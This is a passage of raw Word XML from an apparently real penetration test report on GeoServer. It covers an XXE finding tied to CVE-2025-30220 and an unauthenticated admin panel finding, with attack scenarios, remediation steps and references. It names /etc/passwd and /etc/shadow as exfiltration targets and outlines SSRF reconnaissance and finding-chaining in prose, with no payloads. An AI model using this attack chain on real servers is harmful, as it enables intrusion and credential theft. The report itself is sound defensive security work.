        <w:t xml:space="preserve">Internal Network Reconnaissance via SSRF: By causing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to issue HTTP requests to internal IP ranges, an attacker can map internal network topology, discover services listening on non-public ports, and potentially interact with internal APIs or cloud provider metadata services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Data Exfiltration: Sensitive server-side files including SSL certificates, private keys, database connection strings, and operating system user databases (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/shadow) may be exfiltrated if they are readable by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chained Exploitation: XXE-derived credentials or session information could be combined with the admin panel access weakness (Finding 3.3) to achieve full </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrative control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>While the application does not offer public account creation, the WFS endpoint is typically publicly accessible as it serves map data to external consumers. An attacker does not need an application account to send malicious XML to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, making this the highest-risk finding in this engagement from a technical exploitation standpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to version 2.27.1, 2.26.3, or 2.25.7 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoTools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to version 33.1, 32.3, 31.7, or 28.6.1, as these versions contain the fix for CVE-2025-30220.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If an immediate upgrade is not possible, configure the ENTITY_RESOLUTION_ALLOWLIST property in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to restrict which external domains are permitted for entity resolution, and ensure this restriction applies globally, including to XSD schema processing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement a Web Application Firewall (WAF) rule to detect and block XML requests containing external entity or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>schemaLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> references to untrusted domains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict outbound HTTP/HTTPS connections from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> host to a minimal allowlist of required external endpoints, preventing OOB data exfiltration and SSRF callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> process runs under a least-privilege OS user account, minimising the scope of files accessible in the event of successful XXE exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access logs and network traffic for unexpected outbound connections originating from the server process, which may indicate active exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Required Fix Time Estimation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Immediate — Critical patching priority</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://github.com/geotools/geotools/security/advisories/GHSA-826p-4gcg-35vw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.3  Unauthenticated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administration Panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During testing, it was observed that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administration panel was accessible without authentication under certain conditions due to inconsistent authentication enforcement across the application's access control logic. While the standard </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin interface enforces </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>login requirements for most administrative operations, specific panel pages or interface components were found to load without presenting a valid session or authentication token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This behaviour is indicative of a server-side authentication enforcement gap where the access control check is applied inconsistently — enforced on some endpoints or actions but absent on others within the same administrative panel. This is a common pattern when authentication is enforced at the UI layer rather than at the API or controller layer, allowing direct URL navigation or crafted requests to bypass the login gate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker who identifies these unauthenticated panel entry points could view configuration data, inspect layer definitions, enumerate workspace names, and potentially reach administrative functions that are insufficiently protected downstream.</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6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9900"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Severity: Medium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Impact: High</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Likelihood: Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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B21669" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Affected Hosts / URLs</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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>geoserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/web/ (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GeoServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Admin Panel)</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[Specific unauthenticated admin sub-pages identified during testing]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
        <w:ind w:left="720" w:right="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[Screenshot: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin panel page loading without authentication — showing accessible configuration data / workspace listings / layer information]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack &amp; Risk Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inconsistent authentication enforcement on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin panel exposes several risk scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Configuration Enumeration: An unauthenticated attacker can enumerate workspace names, datastore configurations, layer names, and service endpoint details. This reconnaissance accelerates the attacker's ability to craft targeted WFS/WMS requests or identify data sources that may contain sensitive geospatial information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Exposure of Sensitive Configuration: Admin panel pages may display server configuration parameters, database connection details (partially masked), or file system paths that assist further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pathway to Full Administrative Compromise: If any write-capable administrative functions are reachable without authentication — even partially — an attacker may be able to modify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration, inject malicious styles using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SLD/CSS processing capabilities, or redirect data sources, potentially leading to remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaining with CVE-2025-30220: Workspace and layer configuration data obtained through unauthenticated admin panel access can be used to craft more precise XXE payloads targeting specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> WFS features, increasing the effectiveness of the XXE attack described in Finding 3.2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Although the application requires authenticated account creation (reducing the likelihood of opportunistic exploitation), a targeted attacker who is already probing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> infrastructure would immediately benefit from this access control gap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce server-side authentication on every administrative panel endpoint and sub-page, ensuring that authentication checks are applied at the controller or servlet filter level, not only at the UI/template level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct a review of all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> web interface routes to identify any additional pages or endpoints that do not enforce authentication, and apply consistent access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider placing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin panel behind a network-level access restriction (e.g., only accessible from internal IP ranges or a VPN), entirely removing it from external exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement a reverse proxy or API gateway in front of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that enforces authentication on all /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>geoserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/web/** paths before forwarding requests to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the latest stable release, as some authentication inconsistencies are resolved through version updates alongside CVE patches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Required Fix Time Estimation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Planned — High priority within current sprint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://owasp.org/www-project-top-ten/2017/A5_2017-Broken_Access_Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://docs.geoserver.org/latest/en/user/security/webadmin/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00B21669">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.4  Sensitive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Data Exposure via Unauthenticated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenLayers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B21669" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
